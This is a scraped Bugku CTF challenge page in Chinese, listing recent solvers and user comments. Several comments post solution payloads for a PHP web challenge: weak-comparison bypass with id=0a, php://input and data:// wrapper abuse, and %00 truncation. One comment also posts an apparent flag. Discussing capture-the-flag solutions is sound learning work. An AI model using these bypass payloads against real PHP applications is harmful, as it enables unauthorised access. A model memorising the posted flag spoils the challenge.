评分(20)
解题动态
zttyzz 攻破了该题 1小时前
liuqj 攻破了该题 7小时前
16671766779 攻破了该题 23小时前
GTfree 攻破了该题 1天前
hzx20060101 攻破了该题 2天前
baozongwi 攻破了该题 3天前
17839227036 攻破了该题 6天前
13787026747 攻破了该题 6天前
linzixi 攻破了该题 6天前
wZuMInG 攻破了该题 6天前
The0Razor 攻破了该题 7天前
胡萝卜 攻破了该题 7天前
cy1393842050 攻破了该题 10天前
MrDang 攻破了该题 10天前
Kyrie-Lrving 攻破了该题 10天前
飞天的母猪 攻破了该题 11天前
pbidle 攻破了该题 11天前
ceens 攻破了该题 13天前
Atomic 攻破了该题 13天前
评论
coldplay99999 1月前
举报
flag{bb25f9ec286ae9753bb12e5631da7f1e}
26ww 1月前
举报
66
不会写代码的菜鸟 4月前
举报
难点1.源代码里1.html文件查看跳转bugku导致1.html的源码不容易被捕获,我看了wp用bp抓了n次才抓到。我这种菜鸟根本想不到view resouce。2.抓到源码后的解码要先url解码再base再url才能解出来代码;我擦这一步我不看也做不到。3.这步最难,代码审计,发现id=0,用弱比较,id=0a;a的值来自data直接协议data://text/plain,bugku is a
loulegedadong 5月前
举报
hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd postdata:bugku is a nice plateform!
不懂就问 8月前
举报
参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985
一路奔腾 10月前
举报
POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!
xawm 11月前
举报
?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议
miaolegecui 11月前
举报
firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!
1.23 1年前
举报
flag{我就知道有人投机取巧}
GET-lee 1年前
举报
对于小白来说确实是个好题